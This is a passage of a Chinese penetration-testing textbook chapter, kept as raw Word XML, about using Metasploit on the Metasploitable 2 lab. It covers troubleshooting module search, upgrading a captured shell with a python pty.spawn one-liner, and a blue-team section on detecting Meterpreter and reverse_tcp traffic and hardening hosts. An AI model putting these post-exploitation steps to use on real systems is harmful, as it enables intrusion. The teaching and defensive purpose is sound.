        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回空结果。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可能原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本差异或模块搜索缓存未更新。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_rebuild_cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重建缓存；或通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit-DB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中查找相应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码，再在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内按路径手动加载。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：建立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后键入命令无响应或字符回显异常。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可能原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：非交互式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的终端特性受限（如缺少伪终端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PTY）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中尝试执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script /dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取更稳定的交互式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell（此技术将在第18章详述）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（强制，攻防对称）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">已知载荷特征检测（网络层面）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">各类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在网络上具有可识别的特征。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷的初始连接握手阶段常包含特定长度的载荷块和可识别的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传输模式。网络入侵检测/防御系统（NIDS/NIPS）可通过已维护的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指纹库进行特征匹配告警。例如，Snort/Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则集中包含大量针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷传输特征的检测规则（如“ET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXPLOIT Metasploit Meterpreter Reverse TCP SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection”）。蓝队应在网络边界和内部关键网段部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NIDS，并保持规则库频繁更新（回指卷五第19章关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署与签名管理的详细讨论）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常进程行为检测（主机层面）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等高级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在目标主机上的运行模式具有可检测的行为特征。其执行通常不创建独立磁盘文件（无文件执行），而是完全驻留在内存中；其进程往往由被利用的服务进程（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）派生，形成异常的父子进程关系。蓝队可通过以下方式检测：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">进程树审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控关键服务进程（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务、FTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务等）是否产生了异常子进程（如由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子进程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fork </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或反向连接进程）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内存取证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对可疑进程进行内存</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析，寻找</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLV（Type-Length-Value）协议头特征或已知</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EDR（Endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Response，端点检测与响应）行为监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台可对进程注入、内存分配模式、异常网络连接发起者等行为进行实时监控和告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式检测（会话层面）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信具有特定的周期性心跳或会话保持模式。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型的连接，蓝队可在网络流量日志中检测以下异常模式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由服务器（被控端）主动发向外部不可信</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接（正常情况下服务器应被动接受外部请求，而非主动发起外连）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">长持续时间但低频数据交互的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话（C2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“低慢”通信模式，与传统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求-响应模型的短时高频特征有明显区别）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道等非标准协议上的异常载荷传输（某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS TXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷建立隐蔽</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通道，回指第17.1节关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型的讨论）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队加固与修复策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理消除可利用漏洞（根本性修复）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架主要依赖公开的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块运作，而这些模块绝大多数针对的是已有官方补丁的已知漏洞。蓝队应建立持续性的漏洞管理与补丁部署流程：定期使用漏洞扫描器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Nessus、OpenVAS）扫描资产，将结果与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库交叉比对；对已知可利用漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门、DistCC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞等）进行优先级排序；在测试环境中验证补丁后于限定时间窗口内部署。关键原则是：补丁部署的时效性应小于攻击者从漏洞公开到武器化的时间差（漏洞窗口期）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段限制横向移动（架构性防御）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即使攻击者通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得了某台主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell，网络分段也能显著限制其横向移动的范围。蓝队应将网络划分为不同安全域：对外服务区（DMZ）、内部应用区、数据区、管理区等；在各区域之间部署内部防火墙或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL，仅放行必要的业务流量；对外服务区的主机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器）不应具备直接访问内部数据库或域控制器的权限。若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被部署在严格分段的实验网络中，攻击者即便获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell，也无法直接访问相邻网段中的其他主机——这正是网络分段的纵深防御价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则（权限性防御）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者获得的初始</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
